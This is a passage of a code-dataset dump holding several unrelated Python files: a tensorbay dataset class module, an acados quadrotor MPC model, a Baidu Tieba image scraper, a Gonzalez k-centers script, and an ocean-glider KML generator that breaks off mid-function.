Licensed under MIT License.\n#\n\n\"\"\"Notes, DatasetBase, Dataset and FusionDataset.\n\n:class:`Notes` contains the basic information of a :class:`DatasetBase`.\n\n:class:`DatasetBase` defines the basic concept of a dataset,\nwhich is the top-level structure to handle your data files, labels and other additional information.\n\nIt represents a whole dataset contains several segments\nand is the base class of :class:`Dataset` and :class:`FusionDataset`.\n\n:class:`Dataset` is made up of data collected from only one sensor\nor data without sensor information.\nIt consists of a list of :class:`~tensorbay.dataset.segment.Segment`.\n\n:class:`FusionDataset` is made up of data collected from multiple sensors.\nIt consists of a list of :class:`~tensorbay.dataset.segment.FusionSegment`.\n\n\"\"\"\n\nimport json\nfrom typing import (\n TYPE_CHECKING,\n Any,\n Dict,\n Iterable,\n KeysView,\n Optional,\n Sequence,\n Tuple,\n Type,\n TypeVar,\n Union,\n overload,\n)\n\nfrom ..label import Catalog\nfrom ..utility import (\n Deprecated,\n EqMixin,\n NameMixin,\n NameSortedList,\n ReprMixin,\n ReprType,\n common_loads,\n locked,\n)\nfrom .segment import FusionSegment, Segment\n\nif TYPE_CHECKING:\n from ..client import GAS\n\n_T = TypeVar(\"_T\", FusionSegment, Segment)\n\n\nclass Notes(ReprMixin, EqMixin):\n \"\"\"This is a class stores the basic information of :class:`DatasetBase`.\n\n Arguments:\n is_continuous: Whether the data inside the dataset is time-continuous.\n bin_point_cloud_fields: The field names of the bin point cloud files in the dataset.\n\n \"\"\"\n\n _T = TypeVar(\"_T\", bound=\"Notes\")\n\n _repr_attrs = (\"is_continuous\", \"bin_point_cloud_fields\")\n\n def __init__(\n self, is_continuous: bool = False, bin_point_cloud_fields: Optional[Iterable[str]] = None\n ) -> None:\n self.is_continuous = is_continuous\n self.bin_point_cloud_fields = bin_point_cloud_fields\n\n def __getitem__(self, key: str) -> Any:\n try:\n return getattr(self, key)\n except AttributeError as error:\n raise KeyError(key) from error\n\n def _loads(self, contents: Dict[str, Any]) -> None:\n self.is_continuous = contents[\"isContinuous\"]\n self.bin_point_cloud_fields = contents.get(\"binPointCloudFields\")\n\n @classmethod\n def loads(cls: Type[_T], contents: Dict[str, Any]) -> _T:\n \"\"\"Loads a :class:`Notes` instance from the given contents.\n\n Arguments:\n contents: The given dict containing the dataset notes::\n\n {\n \"isContinuous\": \n \"binPointCloudFields\": [ or null\n , \n ...\n ]\n }\n\n Returns:\n The loaded :class:`Notes` instance.\n\n \"\"\"\n return common_loads(cls, contents)\n\n def keys(self) -> KeysView[str]:\n \"\"\"Return the valid keys within the notes.\n\n Returns:\n The valid keys within the notes.\n\n \"\"\"\n return KeysView(self._repr_attrs) # type: ignore[arg-type]\n\n def dumps(self) -> Dict[str, Any]:\n \"\"\"Dumps the notes into a dict.\n\n Returns:\n A dict containing all the information of the Notes::\n\n {\n \"isContinuous\": \n \"binPointCloudFields\": [ or null\n , \n ...\n ]\n }\n\n \"\"\"\n contents: Dict[str, Any] = {\"isContinuous\": self.is_continuous}\n if self.bin_point_cloud_fields:\n contents[\"binPointCloudFields\"] = self.bin_point_cloud_fields\n return contents\n\n\n# When the NameMixin is before Sequence[_T], typing will raise AttributeError.\n# related issue: python/typing#777\nclass DatasetBase(Sequence[_T], NameMixin): # pylint: disable=too-many-ancestors\n \"\"\"This class defines the concept of a basic dataset.\n\n DatasetBase represents a whole dataset 
contains several segments\n and is the base class of :class:`Dataset` and :class:`FusionDataset`.\n\n A dataset with labels should contain a :class:`~tensorbay.label.catalog.Catalog`\n indicating all the possible values of the labels.\n\n Arguments:\n name: The name of the dataset.\n gas: The :class:`~tensorbay.client.gas.GAS` client for getting a remote dataset.\n revision: The revision of the remote dataset.\n\n Attributes:\n catalog: The :class:`~tensorbay.label.catalog.Catalog` of the dataset.\n notes: The :class:`Notes` of the dataset.\n\n \"\"\"\n\n _is_fusion: bool\n\n _repr_type = ReprType.SEQUENCE\n\n def __init__(\n self, name: str, gas: Optional[\"GAS\"] = None, revision: Optional[str] = None\n ) -> None:\n super().__init__(name)\n\n if gas:\n self._client = gas.get_dataset(name, is_fusion=self._is_fusion)\n if revision:\n self._client.checkout(revision)\n else:\n self._segments: NameSortedList[_T] = NameSortedList()\n self._catalog = Catalog()\n self._notes = Notes()\n\n def __len__(self) -> int:\n return self._get_segments().__len__()\n\n @overload\n def __getitem__(self, index: Union[int, str]) -> _T:\n ...\n\n @overload\n def __getitem__(self, index: slice) -> Sequence[_T]:\n ...\n\n def __getitem__(self, index: Union[int, str, slice]) -> Union[Sequence[_T], _T]:\n if isinstance(index, str):\n return self._get_segments().get_from_name(index)\n\n return self._get_segments().__getitem__(index)\n\n def __delitem__(self, index: Union[int, str, slice]) -> None:\n if isinstance(index, slice):\n for key in self._get_segments()._data.keys()[index]:\n self._get_segments()._data.__delitem__(key)\n return\n\n if isinstance(index, int):\n index = self._get_segments()._data.keys()[index]\n\n self._get_segments()._data.__delitem__(index)\n\n @locked\n def _init_segments(self) -> None:\n self._segments = NameSortedList()\n # pylint: disable=protected-access\n for segment in self._client._list_segment_instances():\n self._segments.add(segment) # type: ignore[arg-type]\n\n def _get_segments(self) -> NameSortedList[_T]:\n if not hasattr(self, \"_segments\"):\n self._init_segments()\n\n return self._segments\n\n @property\n def catalog(self) -> Catalog:\n \"\"\"Return the catalog of the dataset.\n\n Returns:\n The :class:`~tensorbay.label.catalog.Catalog` of the dataset.\n\n \"\"\"\n if not hasattr(self, \"_catalog\"):\n self._catalog = self._client.get_catalog()\n\n return self._catalog\n\n @property\n def notes(self) -> Notes:\n \"\"\"Return the notes of the dataset.\n\n Returns:\n The class:`Notes` of the dataset.\n\n \"\"\"\n if not hasattr(self, \"_notes\"):\n self._notes = self._client.get_notes()\n\n return self._notes\n\n def keys(self) -> Tuple[str, ...]:\n \"\"\"Get all segment names.\n\n Returns:\n A tuple containing all segment names.\n\n \"\"\"\n # pylint: disable=protected-access\n return tuple(self._get_segments()._data)\n\n def load_catalog(self, filepath: str) -> None:\n \"\"\"Load catalog from a json file.\n\n Arguments:\n filepath: The path of the json file which contains the catalog information.\n\n \"\"\"\n with open(filepath, \"r\") as fp:\n contents = json.load(fp)\n self._catalog = Catalog.loads(contents)\n\n @Deprecated(since=\"v1.4.0\", removed_in=\"v1.7.0\", substitute=__getitem__)\n def get_segment_by_name(self, name: str) -> _T:\n \"\"\"Return the segment corresponding to the given name.\n\n Arguments:\n name: The name of the request segment.\n\n Returns:\n The segment which matches the input name.\n\n \"\"\"\n return self._get_segments().get_from_name(name)\n\n 
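# Illustrative usage sketch (editor's addition; the segment name is hypothetical):\n    # plain indexing supersedes this deprecated accessor on a loaded dataset:\n    #     segment = dataset[\"segment_name\"]                      # preferred, via __getitem__\n    #     segment = dataset.get_segment_by_name(\"segment_name\")  # deprecated since v1.4.0\n    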
def add_segment(self, segment: _T) -> None:\n \"\"\"Add a segment to the dataset.\n\n Arguments:\n segment: The segment to be added.\n\n \"\"\"\n self._get_segments().add(segment)\n\n\nclass Dataset(DatasetBase[Segment]):\n \"\"\"This class defines the concept of dataset.\n\n Dataset is made up of data collected from only one sensor or data without sensor information.\n It consists of a list of :class:`~tensorbay.dataset.segment.Segment`.\n\n \"\"\"\n\n _is_fusion = False\n\n def create_segment(self, segment_name: str = \"\") -> Segment:\n \"\"\"Create a segment with the given name.\n\n Arguments:\n segment_name: The name of the segment to create, which default value is an empty string.\n\n Returns:\n The created :class:`~tensorbay.dataset.segment.Segment`.\n\n \"\"\"\n segment = Segment(segment_name)\n self._get_segments().add(segment)\n return segment\n\n\nclass FusionDataset(DatasetBase[FusionSegment]):\n \"\"\"This class defines the concept of fusion dataset.\n\n FusionDataset is made up of data collected from multiple sensors.\n It consists of a list of :class:`~tensorbay.dataset.segment.FusionSegment`.\n \"\"\"\n\n _is_fusion = True\n\n def create_segment(self, segment_name: str = \"\") -> FusionSegment:\n \"\"\"Create a fusion segment with the given name.\n\n Arguments:\n segment_name: The name of the fusion segment to create,\n which default value is an empty string.\n\n Returns:\n The created :class:`~tensorbay.dataset.segment.FusionSegment`.\n\n \"\"\"\n segment = FusionSegment(segment_name)\n self._get_segments().add(segment)\n return segment\n","sub_path":"tensorbay/dataset/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":9924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"203820474","text":"#!/usr/bin/env python\n# coding=UTF-8\n'''\nAuthor: Wei Luo\nDate: 2021-06-01 11:46:48\nLastEditors: Wei Luo\nLastEditTime: 2021-06-02 22:37:34\nNote: Note\n'''\n\nimport casadi as ca\nimport numpy as np\nfrom acados_template import AcadosModel\n\n\ndef export_uav_model():\n g_ = 9.8066\n # control input\n roll_ref_ = ca.SX.sym('roll_ref')\n pitch_ref_ = ca.SX.sym('pitch_ref')\n thrust_ref_ = ca.SX.sym('thrust_ref')\n controls = ca.vcat([roll_ref_, pitch_ref_,\n thrust_ref_])\n\n # model state\n x_ = ca.SX.sym('x')\n y_ = ca.SX.sym('y')\n z_ = ca.SX.sym('z')\n vx_ = ca.SX.sym('vx')\n vy_ = ca.SX.sym('vy')\n vz_ = ca.SX.sym('vz')\n roll_ = ca.SX.sym('roll')\n pitch_ = ca.SX.sym('pitch')\n yaw_ = ca.SX.sym('yaw')\n\n # states [p, q, v]\n states = ca.vcat([x_, y_, z_, vx_, vy_, vz_, roll_, pitch_, yaw_])\n\n # roll_gain = 2.477\n # roll_tau = 0.477\n # pitch_gain = 2.477\n # pitch_tau = 0.477\n\n roll_gain = ca.SX.sym('roll_gain')\n roll_tau = ca.SX.sym('roll_tau')\n pitch_gain = ca.SX.sym('pitch_gain')\n pitch_tau = ca.SX.sym('pitch_tau')\n\n params = ca.vcat([roll_gain, roll_tau, pitch_gain, pitch_tau])\n\n rhs = [\n vx_,\n vy_,\n vz_,\n (ca.cos(roll_) * ca.cos(yaw_) * ca.sin(pitch_) +\n ca.sin(roll_) * ca.sin(yaw_)) * thrust_ref_,\n (ca.cos(roll_) * ca.sin(pitch_) * ca.sin(yaw_) -\n ca.cos(yaw_) * ca.sin(roll_)) * thrust_ref_,\n -g_ + ca.cos(pitch_) * ca.cos(roll_) * thrust_ref_,\n (roll_gain * roll_ref_ - roll_) / roll_tau,\n (pitch_gain * pitch_ref_ - pitch_) / pitch_tau,\n 0.0\n ]\n\n f = ca.Function('f', [states, controls], [ca.vcat(rhs)])\n\n x_dot = ca.SX.sym('x_dot', len(rhs))\n f_impl = x_dot - f(states, controls)\n\n model = AcadosModel()\n model.f_expl_expr = f(states, controls)\n model.f_impl_expr = 
f_impl\n model.x = states\n model.xdot = x_dot\n model.u = controls\n model.p = params\n model.name = 'quadrotor'\n\n constraints = ca.types.SimpleNamespace()\n constraints.roll_min = np.deg2rad(-85)\n constraints.pitch_min = np.deg2rad(-85)\n constraints.roll_max = np.deg2rad(85)\n constraints.pitch_max = np.deg2rad(85)\n constraints.thrust_min = 0.5*g_\n constraints.thrust_max = 1.9*g_\n\n return model, constraints\n","sub_path":"itm_quadrotor_node_old/itm_nonlinear_mpc/solver_generator_scripts_acados/nmpc_acados_uav.py","file_name":"nmpc_acados_uav.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"145609253","text":"# 需求:爬取任意百度贴吧的列表页标题和链接地址; 以及每一个帖子(详情页)内的图片\n# 思路: 使用chrome浏览器中低版本的手机端,找到百度贴吧极速版的入口,使用 xpath 来提取数据\n\"\"\"\nhttps://tieba.baidu.com/mo/q---7EAD792A1FE0B613B16325D0E5802760%3AFG%3D1--1-3-0--2--wapp_1539301430297_582/m?kw=%E6%9D%8E%E6%AF%85&lp=5011&lm=&pn=20\n\n\n\n\"\"\"\nimport json\nimport sys\nimport time\nimport random\n\nfrom lxml import etree\nimport requests\n\n\nclass TiebaSpider:\n def __init__(self, tieba_name):\n self.headers = {\n 'User-Agent': 'Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13'\n }\n self.start_url = 'https://tieba.baidu.com/mo/q---7EAD792A1FE0B613B16325D0E5802760%3AFG%3D1--1-3-0--2--wapp_1539301430297_582/m?kw={}&lp=5011&lm=&pn=0'.format(tieba_name)\n self.part_url = 'https://tieba.baidu.com/mo/q---7EAD792A1FE0B613B16325D0E5802760%3AFG%3D1--1-3-0--2--wapp_1539301430297_582/'\n\n def get_response(self, url):\n print(requests.utils.unquote(url))\n resp = requests.get(url, self.headers)\n # print(resp.content) # 比对请求结果和 element 中结果的区别\n return resp.content\n\n def parse_data(self, html_bytes):\n # print(html_bytes.decode('utf-8', 'ignore'))\n html = etree.HTML(html_bytes)\n # 增加处理逻辑: 控制停止爬取的节点\n a_list = html.xpath('//body/div/div[contains(@class, \"i\")]/a')\n data_list = []\n for a in a_list:\n item = {}\n # url 要拼接\n item['href'] = self.part_url + a.xpath('./@href')[0] if len(a.xpath('./@href')) > 0 else None\n item['title'] = a.xpath('./text()')[0] if len(a.xpath('./@href')) > 0 else None\n item[\"img_list\"] = self.get_img_list(item[\"href\"], [])\n # print(item)\n data_list.append(item)\n # 获取下一页的url地址\n next_url = self.part_url + html.xpath('//a[contains(text(), \"下一页\")]/@href')[0] if len(\n html.xpath('//a[contains(text(), \"下一页\")]/@href')) > 0 else None\n return data_list, next_url\n\n def get_img_list(self, detail_url, img_list):\n # 1.发送请求,获取响应\n detail_html_str = self.get_response(detail_url)\n # 2.提取数据\n detail_html = etree.HTML(detail_html_str)\n img_list += detail_html.xpath(\"//img[@class='BDE_Image']/@src\")\n\n # 详情页下一页的url地址\n next_url = detail_html.xpath(\"//a[text()='下一页']/@href\")\n next_url = self.part_url + next_url[0] if len(next_url) > 0 else None\n if next_url is not None: # 当存在详情页的下一页,请求\n return self.get_img_list(next_url, img_list)\n\n # else不用写\n img_list = [requests.utils.unquote(i).split(\"src=\")[-1] for i in img_list]\n return img_list\n\n def save_content(self, data):\n with open('tieba.txt', 'a', encoding='utf-8') as f:\n f.write(json.dumps(data, ensure_ascii=False, indent=2))\n print(data)\n print('保存成功')\n\n def run(self):\n # 获取url, 这里的url的最后一页数量不确定,所以不能 构造 url 列表\n next_url = self.start_url\n\n while next_url is not None:\n # 发送请求,获取响应\n html = self.get_response(next_url)\n\n # 数据处理\n data_list, next_url = self.parse_data(html)\n\n # 保存\n 
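# (\"保存\" = \"save\") append this page's parsed records to tieba.txt before sleeping and fetching the next listing page\n            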
self.save_content(data_list)\n\n            time.sleep(random.randint(1, 4) * 0.5)  # polite crawl delay between listing pages\n\n\n
if __name__ == '__main__':\n    # print('Run from a terminal as [python3 tieba_spider.py TIEBA_NAME], e.g. [python3 tieba_spider.py \"李毅\"]')\n
    # tieba_name = sys.argv[1]\n    tieba_name = '武汉'\n    spider = TiebaSpider(tieba_name)\n    spider.run()\n","sub_path":"08_tieba_upgrade/tieba_spider.py","file_name":"tieba_spider.py","file_ext":"py","file_size_in_byte":3903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"179505177","text":"'''\n    File name: Gonzalez_centers.py\n    Description: Classic k-centers algorithm which picks the furthest point\n                 as the next center\n    Author: Sharvaree V\n    Last modified: 16th May 2019\n    Python Version: 3.5\n'''\n\n
import numpy as np\nfrom scipy.spatial import distance\nimport math\nimport csv\n\n
def max_dist(data, centers):\n    # NOTE: this variant accumulates the distance to every chosen center;\n    # the textbook Gonzalez rule uses the minimum distance to the centers instead.\n    distances = np.zeros(len(data))  # cumulative distance measure for all points\n
    for cluster_id, center in enumerate(centers):\n        for point_id, point in enumerate(data):\n            if distance.euclidean(point,center) == 0.0:\n                distances[point_id] = -math.inf  # already in cluster\n
            if not math.isinf(distances[point_id]):\n                # add the distance\n                distances[point_id] = distances[point_id] + distance.euclidean(point,center)\n    # return the point which is furthest away\n    return data[np.argmax(distances)]\n\n
def Gonzalez(data, num_clusters, init):\n    '''\n    data            Data as numpy array\n    num_clusters    Number of clusters (k)\n    init            First center to initialize the algorithm\n    '''\n    centers = []\n    centers.append(init)  # initialize the first center\n
    while len(centers) != num_clusters:  # '!=' rather than 'is not': compare values, not object identity\n        centers.append(max_dist(data, centers))\n    return np.array(centers)\n\n\n
# dummy data set\nfrom sklearn import cluster, datasets, mixture\nn_samples=100\nnoisy_circles = datasets.make_circles(n_samples=n_samples, factor=.5,\n                                      noise=.05)\ndata= noisy_circles[0]\nGonzalez_centers = Gonzalez(data, num_clusters=3, init=data[0])\n#print('Cluster Centers:', Gonzalez_centers)\n","sub_path":"lib/Gonzalez_centers.py","file_name":"Gonzalez_centers.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"293203012","text":"#!/usr/bin/env python3\n\"\"\"\nThis module creates glider KMLs for OOI arrays\n\"\"\"\n\n# IMPORTS\nimport os, configparser, time, sys\nfrom fnmatch import fnmatch\n\n# LOCAL IMPORTS\nimport kml_snips as kml\nimport gliderStateXML_parser as gsx\nimport argos_parser\n\n# INVARIABLES\nTRUE_STRINGS = ['TRUE','YES','ON','1']\nFALSE_STRINGS = ['FALSE','NO','OFF','0']\n\n\n
def read_config(config_file):\n\n    config = configparser.ConfigParser(inline_comment_prefixes=('#',))\n    config.optionxform = str # make keys case sensitive\n    config.read(config_file)\n\n
    ## load-in default icons from file ##\n    try:\n        config.read([config['DEFAULT']['icon_ini'],config_file])\n    except KeyError:\n        config.read(['config/default_icons.ini',config_file])\n\n
    ## GROUP CONFIG FILE INTO GLIDERS, MOORINGS, AND SETTINGS ##\n    output = {}\n    for section in config.sections():\n        if section == 'DEFAULT': continue\n\n
        ## ESTABLISHING DEFAULT FILENAME ##\n        if 'file_name' not in config[section].keys() or config[section]['file_name']=='':\n            # default file name: the config file's base name with a .kml extension\n            fname = os.path.basename(config_file)\n            doti = fname.rindex('.')\n            fname = fname[:doti] + '.kml'\n            config[section]['file_name'] = fname\n\n
        array = dict(name=section,gliders={},moorings={},lines={},settings={})\n        for key,val in config[section].items():\n            if 
fnmatch(val,'??05MOAS-?????/D?????') or fnmatch(val,'gliders1/*'):\n array['gliders'][key] = dict(name=key, refdes=val)\n elif len(val.split(' ')) == 2: #startswith(('FLMA','FLMB','HYPM','SUMO')) or fnmatch(key,'PM??'):\n lat,lon = val.split()\n array['moorings'][key] = dict(name=key, lat=lat,lon=lon)\n elif len(val.split(',')) >= 2: # paths\n pairs = val.split(',')\n coords_list = []\n for p in pairs:\n lon,lat = p.strip().split(' ')\n coord = dict(name=key, lat=float(lat),lon=float(lon))\n coords_list.append( coord )\n array['lines'][key] = coords_list\n else:\n if val.upper() in FALSE_STRINGS: val = False\n elif val.upper() in TRUE_STRINGS: val = True\n array['settings'][key] = val\n\n ## DEFAULTS VALUES OF UN-SPECIFIED SETTINGS ##\n #TODO inheritable defaults .ini file\n settings = array['settings']\n options = array['settings'].keys()\n if 'datapath' not in options:\n settings['datapath'] = '.'\n if 'tail_length' not in options:\n settings['tail_length'] = 'inf'\n if 'time_scrolling' not in options:\n settings['time_scrolling'] = False\n if 'show_by_default' not in options:\n settings['show_by_default'] = True\n if 'rich_bubbletext' not in options:\n settings['rich_bubbletext'] = True\n if 'argos_start' not in options:\n settings['argos_start'] = 'inf' #furthest back\n if 'argos_end' not in options:\n settings['argos_start'] = 0 #most recent\n if 'argos_src' not in options:\n settings['argos_src'] = None\n if 'greyout_timeout' not in options:\n settings['greyout_timeout'] = 'inf'\n\n ## ORDER ARRAYS BY OUTPUT FILENAME ##\n try:\n output[ array['settings']['file_name'] ].append(array)\n except KeyError:\n output[ array['settings']['file_name'] ] = [array]\n\n return output\n\ndef make_lines_pmarks(lines, settings):\n pmarks,styles = [],[] \n \n for name,line in lines.items():\n path = kml.LineString(line)\n styleUrl= 'PATH_STYLE_'+name\n try: color = possible_custom_setting(name, 'color', settings)\n except: color = 'white'\n color = kml.HEXCOLOR[color.lower()]\n style=kml.Style(id=styleUrl, LineStyle=kml.LineStyle(color))\n pmark = kml.Placemark(name=name,\n geometry=path,\n styleUrl=styleUrl )\n pmarks.append(pmark)\n styles.append(style)\n return pmarks, styles\n\ndef make_mooring_pmarks(moorings, settings):\n\n pmarks,styles = [],[]\n for mooring in sorted(moorings.values(), key=lambda m: m['name']):\n point = kml.Point(lat=mooring['lat'],\n lon=mooring['lon'])\n\n # assemble mooring icon\n iconURL = possible_custom_setting(mooring['name'], 'mooring_icon', settings)\n styleUrl = 'MOORING_STYLE_'+iconURL[iconURL.rindex('/')+1:]\n style = kml.Style(IconStyle=kml.IconStyle(iconhref=iconURL,scale=1.2,\n hotSpot = kml.IconStyle.hotSpot(y=0.05)), #put icon anchor near bottom center\n BalloonStyle=kml.BalloonStyle(None),\n id=styleUrl)\n lookat = kml.LookAt(range=230000,lat=mooring['lat'],lon=mooring['lon'])\n p = kml.Placemark(name=mooring['name'],\n geometry=point,\n LookAt = lookat,\n styleUrl=styleUrl)\n\n pmarks.append(p)\n styles.append(style)\n styles = list(set(styles))\n return pmarks,styles\n\ndef possible_custom_setting(name,setting,settings):\n try:\n # if custom setting exists use that, else use default\n possible_setting = '{} {}'.format(name,setting)\n settings[possible_setting] # test if key exists\n setting = possible_setting\n except: pass\n setting_val = settings[setting]\n\n # if setting is an icon but not a URL, pre-pend path to web hosted icon_folder\n if '_icon' in setting and not setting_val.startswith('http'):\n return os.path.join(settings['icon_folder'], 
setting_val)\n\n try: return float(setting_val)\n except: return setting_val\n\n\n\ndef make_glider_features(gliders,settings):\n glider_pmarks, glider_surfacings, glider_trails, glider_wpts, glider_argos, styles = [],[],[],[],[],[]\n for glider in sorted(gliders.values(), key=lambda g: g['name']):\n print(' '+glider['name'])\n gstate_path = os.path.join(settings['datapath'],glider['refdes'],'gliderState.xml')\n\n try:\n try: coords, script, wpt, lastabort = gsx.parse(gstate_path)\n except ValueError:\n coords, script, wpt, lastabort = gsx.alt_parse(gstate_path)\n except FileNotFoundError:\n coords, script, wpt, lastabort = gsx.alt_parse(gstate_path)\n except Exception as e:\n print('make_glider_feature() error',type(e),e)\n continue\n except FileNotFoundError as e1:\n print('FNFE:',e1)\n continue\n except IndexError as e1:\n print('FNFE:',e1)\n continue\n\n ### hack to remove one known bad datapoint from one glider ###\n if glider['name'] == 'ga_578':\n for coord in coords:\n if int(coord['lon']) == -144 and int(coord['lat']) == 50:\n coords.remove(coord)\n break\n\n ### GLIDER PMARK ###\n t = coords[-1]['epoch']\n if wpt is None: bearing = None\n else: bearing = wpt['bearing']\n\n style,styleUrl = get_glider_icon_style(settings, bearing, glider['name'],t)\n desc = glider_desc(glider,coords[-1],script,lastabort)\n lookat = kml.LookAt(lat=coords[-1]['lat'],lon=coords[-1]['lon'],range=230000)\n pmark = kml.Placemark(name=glider['name'], # last coord is most recent\n geometry=kml.Point(lat=coords[-1]['lat'],\n lon=coords[-1]['lon']),\n styleUrl=styleUrl,\n description=desc,\n LookAt=lookat,\n Snippet=kml.Snippet(None))\n glider_pmarks.append(pmark)\n styles.append(style)\n\n\n ### GLIDER SURFACINGS ###\n surfmarks = []\n iconURL = possible_custom_setting(glider['name'], 'glider_icon_surf', settings)\n surfacing_style_mousover = kml.Style(IconStyle=kml.IconStyle(iconhref=iconURL, scale=0.8),\n BalloonStyle=kml.BalloonStyle(None))\n surfacing_style_normal = kml.Style(IconStyle=kml.IconStyle(iconhref=iconURL, scale=0.2),\n LabelStyle=kml.LabelStyle(scale=0))\n styleUrl = 'Surfacing_'+iconURL\n surfacing_style = kml.StyleMap(styleUrl, surfacing_style_normal, surfacing_style_mousover)\n styles.append(surfacing_style)\n limit = det_tail_length(settings, 'tail_length', glider['name'], coords)\n for coord in coords[-limit:-1]:\n surface_dialogue_count = coord['dupes']\n name = '{} {}'.format(glider['name'], coord['timestamp'])\n if possible_custom_setting(glider['name'],'time_scrolling',settings):\n ts = kml.TimeStamp(coord['epoch'])\n else: ts = None\n surfmark = kml.Placemark(name=name, styleUrl=surfacing_style.id,\n geometry=kml.Point(lat=coord['lat'],\n lon=coord['lon']),\n time = ts)\n surfmarks.append(surfmark)\n glider_surfacings.append(surfmarks)\n\n\n ### GLIDER TRAIL ###\n styleUrl = 'gtrail'\n limit = det_tail_length(settings, 'tail_length', glider['name'], coords)\n style = kml.Style(id=styleUrl, LabelStyle=kml.LabelStyle(scale=0),\n LineStyle=kml.LineStyle(kml.HEXCOLOR['yellow']))\n styles.append(style)\n time_scrolling = possible_custom_setting(glider['name'],'time_scrolling',settings)\n trailmark = kml.Placemark(name = glider['name']+' Trail',\n styleUrl=styleUrl,\n geometry=kml.LineString(coords[-limit:]))\n glider_trails.append(trailmark)\n\n # # TIME TRAILS are not really working, probably due to glidertrails not being properly injested later\n # for i in range(len(coords[-limit:])-1):\n # geom = kml.LineString(coords[i:i+3]) # returns two consecutive coords\n # tspan = 
kml.TimeSpan(coords[i]['epoch'],coords[i+1]['epoch'])\n # trailmark = kml.Placemark(name=glider['name'] + ' Trail' + str(i),\n # styleUrl=styleUrl,\n # geometry=geom,\n # time=tspan)\n # glider_trails.append(trailmark)\n\n\n ### GLIDER WPT ###\n if wpt is None:\n glider_wpts.append(None)\n else:\n name=\"{}'s Next Waypoint\".format(glider['name'])\n desc = kml.xml('pre','Lat:{:+.3f}\\nLon:{:+.3f}'.format(wpt['lat'],wpt['lon']))\n iconURL = possible_custom_setting(glider['name'], 'nextwpt_icon', settings)\n styleUrl = 'NextWpt_'+iconURL\n nextwpt_style_mouseover = kml.Style(IconStyle=kml.IconStyle(iconhref=iconURL),\n BalloonStyle=kml.BalloonStyle(None))\n nextwpt_style_normal = kml.Style(IconStyle=kml.IconStyle(iconhref=iconURL),\n LabelStyle=kml.LabelStyle(scale=0))\n nextwpt_style = kml.StyleMap(styleUrl, nextwpt_style_normal, nextwpt_style_mouseover)\n styles.append(nextwpt_style)\n wptmark = kml.Placemark(styleUrl=nextwpt_style.id, name=name, description=desc,\n geometry=kml.Point(lat=wpt['lat'],lon=wpt['lon']),\n Snippet=kml.Snippet(None))\n glider_wpts.append(wptmark)\n\n\n ### GLIDER ARGOS ###\n if settings['argos_src']:\n argos_hits = argos_parser.main(settings['argos_src'],glider['name'])\n argos_pmarks = []\n iconURL = possible_custom_setting(glider['name'], 'argos_icon', settings)\n argos_style = kml.Style(id='Argos_'+iconURL,\n IconStyle=kml.IconStyle(iconhref=iconURL, scale=1),\n LabelStyle=kml.LabelStyle(scale=0),\n BalloonStyle=kml.BalloonStyle(None))\n styles.append(argos_style)\n start_limit = det_tail_length(settings, 'argos_start', glider['name'], argos_hits)\n end_limit = det_tail_length(settings, 'argos_end', glider['name'], argos_hits)\n for argos_hit in argos_hits[-start_limit:-end_limit]:\n argos_pmark = kml.Placemark(name=glider['name']+' Argos_Hit '+argos_hit['timestamp'],\n styleUrl=argos_style.id, visibility = 0,\n description = argos_hit['desc'],\n Snippet = kml.Snippet(None),\n geometry=kml.Point(lat=argos_hit['lat'],\n lon=argos_hit['lon']))\n argos_pmarks.append(argos_pmark)\n glider_argos.append(argos_pmarks)\n\n styles = list(set(styles))\n return glider_pmarks, glider_surfacings, glider_trails, glider_wpts, glider_argos, styles\n\ndef glider_desc(glider, coord, script, lastabort):\n\n refdes = '{}\\n\\n'.format(glider['refdes'])\n gps_str = 'GPS HIT: {:+.3f}N {:+.3f}E\\nHIT TIME: {}\\n\\n'.format(coord['lat'],coord['lon'],coord['timestamp'])\n\n try:\n if script['status'] == '0': status = 'paused'\n elif script['status'] == '1': status = 'on'\n else:status = 'unknown. status_code='+script['status']\n script_str = 'SCRIPT: {}\\nSTATUS: {}\\n\\n'.format(script['name'],status)\n except TypeError:\n script_str = '' # for if script is None\n\n try:\n abort_str = 'LAST ABORT\\nTIMESTAMP: {ts}\\nMISSION: {mis}\\nSEGMENT: {seg}\\nREASON: {why}\\nTOTAL: {tot}\\n\\n'\n abort_str = abort_str.format(tot=lastabort['reset_num'],\n ts=lastabort['timestamp'],\n mis=lastabort['mission'],\n seg=lastabort['segment'],\n why=lastabort['type'])\n except TypeError:\n abort_str = '' # for if lastabort is None\n\n ts = time.strftime('%Y-%m-%d %H:%M:00 EST',time.localtime(time.time()))\n footer = '(DATA CURRENT AS OF {})'.format(ts)\n desc = refdes + gps_str + script_str + abort_str + footer\n desc = '
<pre>{}</pre>
'.format(desc)\n return kml.CDATA_wrap(desc)\n\ndef det_tail_length(settings, setting, glidername=None, coords=None ):\n\n limit = possible_custom_setting(glidername, setting,settings)\n\n #num of unique surfacing locations\n if isinstance(limit,(int,float)):\n try: return int(limit)+1\n except OverflowError: return 0 # in-case limit == 'inf'\n\n # DAYS AGO\n if 'day' in limit.lower():\n limit = ''.join(char for char in limit if char.isdigit() or char=='.') # strip limit of non-numbers\n limit = time.time()-int(limit)*24*60*60 # epoch limit\n limit = time.strftime('%Y-%m-%d',time.gmtime(limit))\n\n #DATE\n try:\n for i,coord in enumerate(reversed(coords)):\n if coord['timestamp'] < limit:\n return i\n except Exception as e: print(type(e),e,type(coords))\n\n return 0 # infinite\n\ndef get_glider_icon_style(settings, heading=None, glidername=None, glider_epoch=float('-inf')):\n\n try:\n heading = int(heading)\n if 0 <= heading%360 < 180:\n icon = 'glider_icon_R'\n offset = heading -90-30 # TODO adjust to be more exact (based on latitude??)\n else: # 180 <= heading%360 < 360:\n icon = 'glider_icon_L'\n offset = heading +90-5 # TODO adjust to be more exact (based on latitude??)\n if glider_epoch < time.time()-60*60*possible_custom_setting(glidername,'greyout_timeout',settings):\n icon = 'glider_icon_grey'\n offset = 0\n iconURL = possible_custom_setting(glidername, icon, settings)\n except TypeError as e:\n 